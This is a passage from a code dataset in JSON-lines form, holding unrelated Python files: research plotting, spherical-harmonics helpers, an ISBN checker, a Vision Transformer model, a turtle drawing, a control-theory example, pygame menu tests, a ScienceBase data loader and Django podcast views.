estimator=np.median)\nplt.savefig(result_dir + '/ratios_median.png')\n\nplt.figure('joint_values')\njoint_df = df.loc[df['agent'] == 'joint']\nsns.tsplot(data=joint_df, time='step', value='mean_value', unit='run', condition='type')\nplt.savefig(result_dir + '/joint_values.png')\n\ndf_base = joint_df.loc[joint_df['type'] == 'independent']\ndf_sharing = joint_df.loc[joint_df['type'] == 'sharing']\nratios = df_sharing['mean_value'].values / df_base['mean_value'].values\ndf_sharing.loc[:, 'ratio'] = ratios\n\nplt.figure('joint_ratio')\nsns.tsplot(data=df_sharing, time='step', value='ratio', unit='run')\nplt.savefig(result_dir + '/joint_ratio.png')\n\nplt.figure('joint_ratio_median')\nsns.tsplot(data=df_sharing, time='step', value='ratio', unit='run', estimator=np.median)\nplt.savefig(result_dir + '/joint_ratio_median.png')\n\nplt.figure('trades')\ndf = pd.DataFrame(trade_log)\nsns.tsplot(data=df, time='step', value='mean_trade', unit='run', condition='agent')\nplt.savefig(result_dir + '/trades.png')\n\n# TODO: Compare results for equal target functions with results for varying target functions\n# TODO: Measure trading volume\n# TODO: Measure effect of trading on individual rewards\n# TODO: Measure effect of trading on disparity (e.g. gini index)\n# TODO: Log maximum/minimum single agent value/utility (-> related to disparity)\n# TODO: More than two agents, e.g. 
by increasing the trading action dimensionality.\n# TODO: CMA-ES\n# TODO: Effect of trade clipping/no clipping\n","sub_path":"dos/sharing_robustness.py","file_name":"sharing_robustness.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8105957","text":"import numpy as np\r\nimport lie_learn\r\nfrom lie_learn.representations.SO3 import spherical_harmonics as sh\r\nfrom lie_learn.spaces import S2, spherical_quadrature as sq\r\nfrom lie_learn.representations.SO3 import wigner_d as wd\r\n\r\n#good for complex\r\ndef change_coordinates_R2(coords, p_from = \"C\"):\r\n #p_from can be \"C\" (Cartesian) or anything else (polar coordinates)\r\n #coords should be an ndarray of two columns (x,y) or (r, ro)\r\n #routine used to transform 2d picture to coords that represent points on the sphere\r\n #coords[:,0] is beta and coords[:,1] is alpha\r\n if p_from == \"C\":\r\n cartesian_coords = coords.copy()\r\n coords[:, 0] = np.sum(cartesian_coords**2,1)\r\n coords[:, 1] = np.arctan2(cartesian_coords[:, 1], cartesian_coords[:,0])\r\n coords[:, 0] = np.pi * coords[:, 0]\r\n return coords\r\n\r\n\r\n#good for complex\r\ndef get_coef_grid(f_grid, a = 1.0):\r\n #Generate the coordinates and activation values according to Risi's paper\r\n n = f_grid.shape[0]\r\n x, y = np.where(f_grid == f_grid)\r\n new_f = f_grid[x, y]\r\n x = (x.astype(float) - (n - 1) / 2) / (n/2) * a\r\n y = (y.astype(float) - (n - 1) / 2) / (n/2) * a\r\n r = x**2 + y ** 2\r\n idx = r < 1\r\n coords = np.stack((x[idx], y[idx]), axis=-1)\r\n new_f = new_f[idx]\r\n return change_coordinates_R2(coords), new_f\r\n\r\ndef _rotation_matrix(angles, wikipedia=False):\r\n s1 = np.sin(angles[0])\r\n s2 = np.sin(angles[1])\r\n s3 = np.sin(angles[2])\r\n c1 = np.cos(angles[0])\r\n c2 = np.cos(angles[1])\r\n c3 = np.cos(angles[2])\r\n if wikipedia:\r\n R = np.asmatrix([[c1*c2*c3 - s1*s3, -c3*s1 - c1*c2*s3, c1*s2],\r\n [c1*s3 + c2*c3*s1, c1*c3 - c2*s1*s3, s1*s2],\r\n [-c3*s2, s2*s3, c2]])\r\n else:\r\n Rz = np.asmatrix([[c1,-s1,0], [s1,c1,0], [0,0,1]])\r\n Ry = np.asmatrix([[c2, 0, -s2], [0,1,0], [s2,0, c2]])\r\n Rz2 = np.asmatrix([[c3,-s3,0], [s3,c3,0], [0,0,1]])\r\n R = (Rz2 * Ry * Rz).T\r\n return R\r\n\r\n\r\n#good for complex\r\ndef rotate_coords(beta, alpha, angles, direction=1):\r\n #Rotate the spherical coordinates by angles (a tuple of three Euler angles)\r\n if direction == -1:\r\n angles = (-angles[0], -angles[1], -angles[2])\r\n scoords = np.stack((beta, alpha), -1)\r\n ccoords = S2.change_coordinates(scoords, \"S\", \"C\")\r\n\r\n R = _rotation_matrix(angles, wikipedia=False)\r\n ccoords_rotated = np.asarray((R * ccoords.T).T)\r\n\r\n scoords_rotated = S2.change_coordinates(ccoords_rotated, 'C', 'S')\r\n return scoords_rotated[:,0], scoords_rotated[:,1]\r\n\r\n\r\n\r\n#good for complex (caveat: only taking inner product)\r\ndef get_coef_C(f, beta, alpha, \r\n lmax=14, \r\n chop_coeffs=False, \r\n complexFlag=True,\r\n sph=None):\r\n #Each row of f, beta, alpha form a point on the sphere, where f is the activation value\r\n #Compute the coefficients, spherical harmonics values, and return them and f,beta,alpha back\r\n\r\n if sph is None:\r\n #If sph is given, reuse it. 
This might help improve performance\r\n sph = np.zeros((len(f),(lmax+1)**2), dtype=complex)\r\n for l in range(lmax + 1):\r\n for m in range(-l, l+1):\r\n if complexFlag:\r\n sph[:, l**2+(m+l)] = sh.csh(l,m,beta,alpha,'quantum',True)\r\n else:\r\n sph[:, l**2+(m+l)] = sh.rsh(l,m,beta,alpha,'quantum',True)\r\n coefs = (np.expand_dims(f, 1)*sph).sum(0)\r\n \r\n if chop_coeffs:\r\n n = len(coefs)\r\n st = 0\r\n d = 1\r\n coefs_old = coefs\r\n coefs = []\r\n while(st < n):\r\n coefs.append(coefs_old[st:(st+d)].copy())\r\n st += d\r\n d += 2\r\n return coefs, sph\r\n else:\r\n return coefs, sph\r\n\r\ndef reconstruct(f, beta=None, alpha=None, complexFlag=False):\r\n if beta is None or alpha is None:\r\n coords = get_coef_grid(np.zeros((28,28)))[0]\r\n beta = coords[:,0]\r\n alpha = coords[:,1]\r\n vs = np.zeros(beta.shape, dtype=complex if complexFlag else float)\r\n sh_func = sh.csh if complexFlag else sh.rsh\r\n if isinstance(f, list):\r\n lmax = len(f) - 1\r\n for l in range(lmax+1):\r\n for m in range(-l,l+1):\r\n vs[:] += f[l][m+l] * sh_func(l,m,beta, alpha,\"quantum\",False)\r\n else:\r\n lmax = int(np.sqrt(f.shape[0])) - 1\r\n for l in range(lmax+1):\r\n for m in range(-l,l+1):\r\n vs[:] += f[l**2+m+l] * sh_func(l,m,beta, alpha,\"quantum\",False)\r\n return vs\r\n\r\n#NOT good for complex\r\ndef plot_sphere_func(f, beta=None, alpha=None, normalize=True):\r\n if beta is None or alpha is None:\r\n coords = get_coef_grid(np.zeros((28,28)))[0]\r\n beta = coords[:,0]\r\n alpha = coords[:,1]\r\n # TODO: update this function now that we have changed the order of axes in f\r\n import matplotlib.pyplot as plt\r\n from matplotlib import cm, colors\r\n from mpl_toolkits.mplot3d import Axes3D\r\n from scipy.special import sph_harm\r\n\r\n if normalize:\r\n #f = (f - np.min(f)) / (np.max(f) - np.min(f))\r\n print(\"Normalizing pixels\")\r\n f = (f - np.mean(f)) / np.std(f)\r\n\r\n\r\n x = np.sin(beta) * np.cos(alpha)\r\n y = np.sin(beta) * np.sin(alpha)\r\n z = np.cos(beta)\r\n if f.ndim == 2:\r\n f = cm.gray(f)\r\n print('2')\r\n\r\n # Set the aspect ratio to 1 so our sphere looks spherical\r\n fig = plt.figure(figsize=plt.figaspect(1.))\r\n ax = fig.add_subplot(111, projection='3d')\r\n #ax.plot_surface(x, y, z, rstride=1, cstride=1, facecolors=f ) # cm.gray(f))\r\n #ax.plot_trisurf(x,y,z,color=f)\r\n ax.scatter(xs=x,ys=y,zs=z,c=f)\r\n\r\n # Turn off the axis planes\r\n ax.set_axis_off()\r\n plt.show()\r\n\r\n#NOT good for complex\r\n\"\"\"Checking covariance\"\"\"\r\ndef rotate_Y(l, Y, alpha, beta, gamma):\r\n #Rotating the Y (spherical harmonic values) with three Euler angles\r\n #each row of Y is the spherical harmonic values at one point (or different bases)\r\n Y2 = Y.copy()\r\n D = wd.wigner_D_matrix(l, alpha,beta,gamma)\r\n for pix in range(Y.shape[0]):\r\n for m in range(-l, l+1, 1): \r\n Y2[pix,m] = np.sum(D[m,:] * Y[pix,:])\r\n return Y2\r\n","sub_path":"CGNet/geometries.py","file_name":"geometries.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"123228006","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 22 11:08:29 2019\n\n@author: xie\n\"\"\"\n\nn = input().split('-')\nans0 = ''\nans = 0\n\nfor i in n[:-1]:\n ans0 += str(i)\n\nt = 1\n\nfor c in ans0:\n ans += int(c)*t\n t += 1\n\nif n[-1] == 'X':\n if ans % 11 == 10:\n print('Right')\n else:\n for i in n[:-1]:\n print(i, end='-')\n print(ans % 11)\nelse:\n if ans % 11 == int(n[-1]):\n print('Right')\n 
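# wrong check digit: print the code again with the corrected digit ('X' stands for 10)\n 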
else:\n for i in n[:-1]:\n print(i, end='-')\n print(ans % 11 if ans%11 != 10 else 'X')\n\n","sub_path":"洛谷自行练习/P1055 ISBN号码.py","file_name":"P1055 ISBN号码.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"126478671","text":"\"\"\"\noriginal code from rwightman:\nhttps://github.com/rwightman/pytorch-image-models/blob/master/timm/models/vision_transformer.py\n\"\"\"\nfrom functools import partial\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\n\n\ndef drop_path(x, drop_prob: float = 0., training: bool = False):\n \"\"\"\n Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,\n the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...\n See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for\n changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use\n 'survival rate' as the argument.\n \"\"\"\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets\n random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_() # binarize\n output = x.div(keep_prob) * random_tensor\n return output\n\n\nclass DropPath(nn.Module):\n \"\"\"\n Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n \"\"\"\n\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training)\n\n\nclass Attention(nn.Module):\n def __init__(self,\n dim, # dim of each input token\n num_heads=8,\n qkv_bias=False,\n qk_scale=None,\n attn_drop_ratio=0.,\n proj_drop_ratio=0.):\n super(Attention, self).__init__()\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop_ratio)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop_ratio)\n\n def forward(self, x):\n # [batch_size, num_patches + 1, total_embed_dim]\n B, N, C = x.shape\n\n # qkv(): -> [batch_size, num_patches + 1, 3 * total_embed_dim]\n # reshape: -> [batch_size, num_patches + 1, 3, num_heads, embed_dim_per_head]\n # permute: -> [3, batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n # [batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)\n\n # transpose: -> [batch_size, num_heads, embed_dim_per_head, num_patches + 1]\n # @: multiply -> [batch_size, num_heads, num_patches + 1, num_patches + 1]\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n\n # @: multiply -> [batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n # transpose: -> [batch_size, num_patches + 1, num_heads, embed_dim_per_head]\n # reshape: -> [batch_size, num_patches + 1, total_embed_dim]\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n\nclass 
Mlp(nn.Module):\n \"\"\"\n MLP as used in Vision Transformer, MLP-Mixer and related networks\n \"\"\"\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass Block(nn.Module):\n def __init__(self,\n dim,\n num_heads,\n mlp_ratio=4.,\n qkv_bias=False,\n qk_scale=None,\n drop_ratio=0.,\n attn_drop_ratio=0.,\n drop_path_ratio=0.,\n act_layer=nn.GELU,\n norm_layer=nn.LayerNorm):\n super(Block, self).__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale,\n attn_drop_ratio=attn_drop_ratio, proj_drop_ratio=drop_ratio)\n # NOTE: drop path for stochastic depth, we shall see if this is better than dropout here\n self.drop_path = DropPath(drop_path_ratio) if drop_path_ratio > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop_ratio)\n\n def forward(self, x):\n x = x + self.drop_path(self.attn(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass VisionTransformer(nn.Module):\n def __init__(self, num_patches, input_dim=51, num_classes=5,\n embed_dim=768, depth=12, num_heads=12, mlp_ratio=4.0, qkv_bias=True,\n qk_scale=None, representation_size=None, distilled=False, drop_ratio=0.,\n attn_drop_ratio=0., drop_path_ratio=0., norm_layer=None,\n act_layer=None):\n \"\"\"\n Args:\n img_size (int, tuple): input image size\n patch_size (int, tuple): patch size\n in_c (int): number of input channels\n num_classes (int): number of classes for classification head\n embed_dim (int): embedding dimension\n depth (int): depth of transformer\n num_heads (int): number of attention heads\n mlp_ratio (int): ratio of mlp hidden dim to embedding dim\n qkv_bias (bool): enable bias for qkv if True\n qk_scale (float): override default qk scale of head_dim ** -0.5 if set\n representation_size (Optional[int]): enable and set representation layer (pre-logits) to this value if set\n distilled (bool): model includes a distillation token and head as in DeiT models\n drop_ratio (float): dropout rate\n attn_drop_ratio (float): attention dropout rate\n drop_path_ratio (float): stochastic depth rate\n embed_layer (nn.Module): patch embedding layer\n norm_layer: (nn.Module): normalization layer\n \"\"\"\n super(VisionTransformer, self).__init__()\n self.num_classes = num_classes\n self.num_features = self.embed_dim = embed_dim # num_features for consistency with other models\n self.num_tokens = 2 if distilled else 1\n norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)\n act_layer = act_layer or nn.GELU\n\n self.patch_embed = nn.Linear(input_dim, embed_dim)\n\n self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))\n self.dist_token = nn.Parameter(torch.zeros(1, 1, embed_dim)) if distilled else None\n self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + self.num_tokens, embed_dim))\n self.pos_drop = nn.Dropout(p=drop_ratio)\n\n self.blocks = nn.Sequential(*[\n Block(dim=embed_dim, num_heads=num_heads, 
mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop_ratio=drop_ratio, attn_drop_ratio=attn_drop_ratio, drop_path_ratio=drop_path_ratio,\n norm_layer=norm_layer, act_layer=act_layer)\n for i in range(depth)\n ])\n self.norm = norm_layer(embed_dim)\n\n # Representation layer\n if representation_size and not distilled:\n self.has_logits = True\n self.num_features = representation_size\n self.pre_logits = nn.Sequential(OrderedDict([\n (\"fc\", nn.Linear(embed_dim, representation_size)),\n (\"act\", nn.Tanh())\n ]))\n else:\n self.has_logits = False\n self.pre_logits = nn.Identity()\n\n # Classifier head(s)\n self.head = nn.Linear(self.num_features, num_classes) if num_classes > 0 else nn.Identity()\n self.head_dist = None\n if distilled:\n self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()\n\n def forward_features(self, x):\n # [B, C, H, W] -> [B, num_patches, embed_dim]\n x = self.patch_embed(x) # [B, 196, 768]\n # [1, 1, 768] -> [B, 1, 768]\n cls_token = self.cls_token.expand(x.shape[0], -1, -1)\n if self.dist_token is None:\n x = torch.cat((cls_token, x), dim=1) # [B, 197, 768]\n else:\n x = torch.cat((cls_token, self.dist_token.expand(x.shape[0], -1, -1), x), dim=1)\n\n x = self.pos_drop(x + self.pos_embed)\n x = self.blocks(x)\n x = self.norm(x)\n if self.dist_token is None:\n return self.pre_logits(x[:, 0])\n else:\n return x[:, 0], x[:, 1]\n\n def forward(self, x):\n x = self.forward_features(x)\n if self.head_dist is not None:\n x, x_dist = self.head(x[0]), self.head_dist(x[1])\n if self.training and not torch.jit.is_scripting():\n # during inference, return the average of both classifier predictions\n return x, x_dist\n else:\n return (x + x_dist) / 2\n else:\n x = self.head(x)\n return x\n","sub_path":"代码——Transfer/transformer_model.py","file_name":"transformer_model.py","file_ext":"py","file_size_in_byte":9887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"572864407","text":"import turtle\nimport random\n\nturtle.speed(25)\nturtle.setheading(0)\n\ndef pinwheel(num_branch, size, backup):\n turtle.pendown()\n for i in range (num_branch):\n turtle.forward(size)\n turtle.backward(backup)\n turtle.right(360/num_branch)\n turtle.penup()\n\nturtle.penup()\nfor i in range (10):\n # shuffle zone\n x = random.randint(-325, 325)\n y = random.randint(-325, 325)\n clr_list = random.choice(['red', 'blue', 'gold', 'brown', 'violet', 'pink', 'orange', 'yellow'])\n pensize = random.randint(5, 25)\n side = random.randint(5, 20)\n shapesize = random.randint(25, 150)\n backup = random.randint(25, 150)\n # turtle zone\n turtle.goto(x, y)\n turtle.pencolor(clr_list)\n turtle.pensize(pensize)\n pinwheel(side,shapesize,backup)\nturtle.done()","sub_path":"6310545566_Phawit_ex4/pinwheel.py","file_name":"pinwheel.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"257197942","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom utils import RGA\n\n# The following code performs Example 3.11 of Skogestad.\ndef G(s):\n G = 0.01*np.exp(-5*s)/((s + 1.72e-4)*(4.32*s + 1))*np.array([[-34.54*(s + 0.0572), 1.913], [-30.22*s, -9.188*(s + 6.95e-4)]])\n return G\n\ndef RGAnumberDiag(A):\n RGAnumD = np.sum(np.abs(RGA(A) - np.identity(len(A))))\n return RGAnumD\n\ndef RGAnumberoffDiag(A):\n RGAnumOD = np.sum(np.abs(RGA(A) - np.array([[0, 1], [1, 0]])))\n return RGAnumOD\n\nw = np.logspace(-5, 1, 
1000)\ns = 1j*w\nfreq = list(map(G, s)) # materialize the map: a lazy iterator would be exhausted after the first pass below\n\nl = [R for R in map(RGA, freq)]\nDiagnum = np.array([Rd for Rd in map(RGAnumberDiag, freq)])\noffDiagnum = np.array([Rod for Rod in map(RGAnumberoffDiag, freq)])\n\nplt.subplot(1, 2, 1)\nplt.semilogx(w, [np.abs(l[i][0, 0]) for i in range(0, len(w))], 'r')\nplt.semilogx(w, [np.abs(l[i][0, 1]) for i in range(0, len(w))], 'b')\nplt.title('(a)')\nplt.text(3e-4, 0.8, '|$\\\lambda$$_1$$_2$| = |$\\\lambda$$_2$$_1$|', fontsize=15)\nplt.text(3e-4, 0.2, '|$\\\lambda$$_1$$_1$| = |$\\\lambda$$_2$$_2$|', fontsize=15)\n\nplt.subplot(1, 2, 2)\nplt.semilogx(w, [Diagnum[i] for i in range(0, len(w))], 'r')\nplt.semilogx(w, [offDiagnum[i] for i in range(0, len(w))], 'b')\nplt.title('(b)')\nplt.text(1e-4, 3.2, 'Diagonal pairing', fontsize=15)\nplt.text(1e-4, 0.5, 'Off-diagonal pairing', fontsize=15)\nplt.show()\n","sub_path":"Example_03_11.py","file_name":"Example_03_11.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"511313776","text":"# try:\nimport unittest\n\nimport pygame\n\nfrom settings import *\nfrom main_menu import MainMenu\n\n# except ImportError as message:\n # raise SystemExit(message)\n\n\nclass MainMenuTest(unittest.TestCase):\n def setUp(self):\n # pygame.display.set_mode()\n\n self.main_menu = MainMenu()\n self.surface = pygame.Surface((0, 0))\n self.event_quit = pygame.event.Event(pygame.QUIT)\n self.event_enter1 = pygame.event.Event(pygame.KEYDOWN,\n {'key': MAIN_CONTROLS[0]})\n self.event_enter2 = pygame.event.Event(pygame.KEYDOWN,\n {'key': MAIN_CONTROLS[1]})\n self.event_escape = pygame.event.Event(pygame.KEYDOWN,\n {'key': MAIN_CONTROLS[2]})\n self.event_up1 = pygame.event.Event(pygame.KEYDOWN,\n {'key': P1_CONTROLS[2]})\n self.event_up2 = pygame.event.Event(pygame.KEYDOWN,\n {'key': P2_CONTROLS[2]})\n self.event_down1 = pygame.event.Event(pygame.KEYDOWN,\n {'key': P1_CONTROLS[3]})\n self.event_down2 = pygame.event.Event(pygame.KEYDOWN,\n {'key': P2_CONTROLS[3]})\n\n def tearDown(self):\n # pygame.display.quit()\n\n del self.main_menu\n del self.surface\n del self.event_quit\n del self.event_escape\n del self.event_enter1\n del self.event_enter2\n del self.event_up1\n del self.event_up2\n del self.event_down1\n del self.event_down2\n\n def test_sound(self):\n pygame.event.post(self.event_quit)\n self.main_menu.main(self.surface)\n self.assertFalse(pygame.mixer.get_busy())\n\n def test_reinit(self):\n pygame.event.post(self.event_up1)\n pygame.event.post(self.event_enter2)\n self.main_menu.main(self.surface)\n self.assertFalse(self.main_menu.pointer == 0)\n self.assertIsNot(self.main_menu.get_pressed_button(), None)\n\n self.main_menu.reinit()\n self.assertTrue(self.main_menu.pointer == 0)\n self.assertIs(self.main_menu.get_pressed_button(), None)\n\n def test_update(self):\n self.main_menu.pointer = 182732\n self.main_menu.update()\n\n self.assertTrue(self.main_menu.pointer >= 0 and\n self.main_menu.pointer < len(self.main_menu.buttons))\n self.assertTrue(self.main_menu.buttons[self.main_menu.pointer].\n is_flagged)\n for index in range(len(self.main_menu.buttons)):\n if index != self.main_menu.pointer:\n self.assertFalse(self.main_menu.buttons[index].is_flagged)\n\n def test_main(self):\n pygame.event.post(self.event_quit)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, EXIT)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_escape)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, EXIT)\n\n 
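# the enter key on the default selection should open the character menu\n 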
self.main_menu.reinit()\n pygame.event.post(self.event_enter1)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, CHARACTER_MENU)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_enter2)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, CHARACTER_MENU)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_down1)\n pygame.event.post(self.event_enter1)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, OPTIONS_MENU)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_up2)\n pygame.event.post(self.event_up1)\n pygame.event.post(self.event_enter2)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, OPTIONS_MENU)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_up1)\n pygame.event.post(self.event_enter1)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, EXIT)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_down1)\n pygame.event.post(self.event_down2)\n pygame.event.post(self.event_enter2)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, EXIT)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_main_menu.py","file_name":"test_main_menu.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"372457057","text":"# coding: utf-8\n\nfrom IPython.display import display\nimport requests,io,csv\nfrom datetime import datetime\nfrom bis2 import dd\nfrom bis import sgcn\n\nbisDB = dd.getDB(\"bis\")\nsgcnCollection = bisDB[\"SGCN Source Data\"]\n\nswapCollection = \"https://www.sciencebase.gov/catalog/items?parentId=56d720ece4b015c306f442d5&format=json&fields=files,tags,dates&max=1000\"\nsbR = requests.get(swapCollection).json()\n\nfor item in sbR[\"items\"]:\n sourceItem = sgcn.sgcn_source_item_metadata(item)\n \n if sourceItem is None:\n continue\n\n currentRecord = sgcnCollection.find_one({\"processingMetadata.processFileURL\":sourceItem[\"processingMetadata\"][\"processFileURL\"]})\n\n if currentRecord is None:\n sourceItemWithData = sgcn.process_sgcn_source_file(sourceItem)\n \n if len(sourceItemWithData[\"sourceData\"]) > 0:\n sgcnCollection.insert_one(sourceItemWithData)\n print (sourceItemWithData[\"processingMetadata\"][\"sgcn_state\"], sourceItemWithData[\"processingMetadata\"][\"sgcn_year\"], sourceItemWithData[\"processingMetadata\"][\"sourceID\"])\n\n","sub_path":"1_ProcessSGCNRepositorySourceFiles.py","file_name":"1_ProcessSGCNRepositorySourceFiles.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395718653","text":"from django.shortcuts import render, redirect\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Count, Max, Case, When\nfrom django.urls import reverse_lazy\nfrom django.views.generic.list import ListView\nfrom django.views.generic.edit import DeleteView\n\nfrom podcasts.conf import * # noqa\nfrom podcasts.forms import NewFromURLForm, ListenerSettingsForm, AdminSettingsForm, SiteSettingsForm\nfrom podcasts.models.podcast import Podcast\nfrom podcasts.utils import refresh_feed, chunks, handle_uploaded_file, parse_opml_file\n\nimport json\nimport requests\n\n\n# Create your views here.\ndef index(request):\n # return render(request, 
'index.html')\n return redirect('podcasts:podcasts-list')\n\n\nclass PodcastsList(ListView):\n model = Podcast\n paginate_by = PODCASTS_PER_PAGE\n template_name = 'podcasts-list.html'\n\n def get_queryset(self, **kwargs):\n user_ordering = self.request.user.listener.sort_order_podcasts\n queryset = (\n Podcast.objects\n .prefetch_related('subscribers', 'subscribers')\n .prefetch_related('followers', 'followers')\n .annotate(num_episodes=Count('episodes'))\n .annotate(downloaded_episodes=Count(Case(\n When(episodes__downloaded__isnull=False, then=1))))\n .annotate(last_episode_date=Max('episodes__published'))\n .filter(followers=self.request.user.listener)\n .order_by(user_ordering)\n )\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\ndef podcasts_new(request):\n if request.method == 'POST':\n form = NewFromURLForm(request.POST, request.FILES, request=request)\n if form.is_valid():\n if form.cleaned_data['feed_url']:\n podcast, created = Podcast.objects.get_or_create_from_feed_url(\n form.cleaned_data['feed_url'],\n )\n podcast.add_subscriber(request.user.listener)\n podcast.add_follower(request.user.listener)\n\n if 'opml_file' in request.FILES:\n tempfile = handle_uploaded_file(request.FILES['opml_file'])\n feeds = parse_opml_file(tempfile)\n\n for feed in feeds:\n podcast, created = Podcast.objects.get_or_create_from_feed_url(feed)\n if podcast is not None:\n podcast.add_subscriber(request.user.listener)\n podcast.add_follower(request.user.listener)\n\n if form.cleaned_data['feed_url'] and not form.cleaned_data['opml_file']:\n return redirect('podcasts:podcasts-details', slug=podcast.slug)\n else:\n return redirect('podcasts:podcasts-list')\n\n else:\n form = NewFromURLForm()\n discovery = None\n\n url = 'https://rss.itunes.apple.com/api/v1/us/podcasts/top-podcasts/all/25/explicit.json'\n response = requests.get(url)\n\n if response.status_code >= 400:\n discovery = None\n else:\n discovery = json.loads(response.content)\n discovery['feeds'] = list(chunks(discovery['feed']['results'][:15], 5))\n discovery['aggregator'] = discovery['feed']['author']['name']\n discovery['copyright'] = discovery['feed']['copyright']\n\n context = {\n 'form': form,\n 'discovery': discovery,\n }\n return render(request, 'podcasts-new.html', context)\n\n\ndef podcasts_details(request, slug):\n podcast = get_object_or_404((\n Podcast.objects\n .prefetch_related('episodes', 'episodes')\n .prefetch_related('subscribers', 'subscribers'))\n .annotate(num_episodes=Count('episodes'))\n .annotate(downloaded_episodes=Count(Case(\n When(episodes__downloaded__isnull=False, then=1))))\n .annotate(last_episode_date=Max('episodes__published')),\n slug=slug)\n\n user_ordering = request.user.listener.sort_order_episodes\n\n user_is_subscriber = podcast.subscribers.filter(user=request.user).exists()\n episodes = podcast.episodes.order_by(user_ordering)[:10]\n\n context = {\n 'user_is_subscriber': user_is_subscriber,\n 'podcast': podcast,\n 'episodes': episodes,\n }\n return render(request, 'podcasts-details.html', context)\n\n\nclass PodcastDeleteView(DeleteView):\n model = Podcast\n context_object_name = 'podcast'\n success_url = reverse_lazy('podcasts:podcasts-list')\n template_name = 'podcasts/podcast_check_delete.html'\n\n\ndef podcasts_refresh_feed(request, slug):\n podcast = get_object_or_404(Podcast, slug=slug)\n podcast.update(update_all=True)\n next = request.GET.get('next', '/')\n return redirect(next)\n\n\ndef 